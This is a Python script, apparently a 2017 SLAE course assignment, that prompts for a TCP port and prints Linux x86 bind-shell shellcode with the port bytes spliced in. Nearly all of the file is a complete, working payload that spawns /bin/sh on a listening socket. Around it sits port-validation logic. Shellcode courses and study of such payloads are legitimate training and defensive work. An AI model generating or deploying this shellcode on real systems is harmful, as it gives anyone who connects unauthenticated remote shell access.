Created
May 25, 2017 08:05
SLAE Assignment #1 - Bind Shellcode Generator
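#!/usr/bin/env python
"""SLAE Assignment #1 - bind shellcode generator.

Asks for a TCP port, validates it, and prints the shellcode as text (hex
escape sequences) with the two port bytes spliced in between a fixed prefix
and a fixed suffix. The script only prints a string; it does not execute or
send anything.

Uses single-argument print() calls and an input shim so the same file runs
on Python 2 and Python 3.
"""

# The payload is cut apart at the port operand so the port can be substituted.
# Everything except the two port bytes is constant across generated payloads,
# so the prefix and suffix are stable byte sequences for static signatures.
shellcodefront = r"\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x53\x6a\x02\x89\xe1\xcd\x80\x92\x43\x56\x66\x68"
shellcodeback = r"\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x57\x52\x89\xe1\xcd\x80\xb0\x66\x43\x57\x52\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x57\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"

try:
    _read_line = raw_input  # Python 2
except NameError:
    _read_line = input  # Python 3


def encode_port(port):
    """Return *port* as two textual hex escapes, high byte first.

    Args:
        port: TCP port number as an int.

    Returns:
        A string of the form backslash-x-HH backslash-x-LL.

    Raises:
        ValueError: if *port* is outside 1-65535, or if either of its two
            bytes is 0x00 (the generated payload must not contain a NULL
            byte).
    """
    if not 1 <= port <= 65535:
        # Without this check format() yields more than four hex digits (or a
        # sign), and the slices below would silently encode a different port.
        raise ValueError("port number " + str(port) + " is outside 1-65535")
    port4x = format(port, '04x')
    high, low = port4x[:2], port4x[2:]
    if high == "00" or low == "00":
        # High byte is 00 for every port below 256; low byte is 00 for every
        # multiple of 256.
        raise ValueError("port number " + str(port) + " creates a NULL byte")
    return "\\x" + high + "\\x" + low


def main():
    """Prompt until a usable port is entered, then print the shellcode text."""
    print("+------------------------------------+")
    print("| Bind Shellcode |")
    print("| SLAE Assignment #1 SLAE-895 |")
    print("| Generator Script 1.0 |")
    print("+------------------------------------+\n")
    while True:
        portnum = _read_line("Enter the port number to bind to: ")
        try:
            port = int(portnum)
        except ValueError:
            # Re-prompt instead of dying with a traceback on non-numeric input.
            print("Invalid port chosen, " + repr(portnum) + " is not a whole number, try another port\n")
            continue
        try:
            custom_port = encode_port(port)
        except ValueError as err:
            print("Invalid port chosen, " + str(err) + ", try another port\n")
            continue
        print("Port number to inject: " + custom_port + "\n")
        print("Here is your shellcode:\n")
        print(shellcodefront + custom_port + shellcodeback + "\n")
        if port < 1024:
            # Ports below 1024 are privileged on Linux; 1024 itself never gets
            # here because its low byte is 0x00.
            print("Remember you need to be root to open this port!\n\n")
        break


if __name__ == "__main__":
    main()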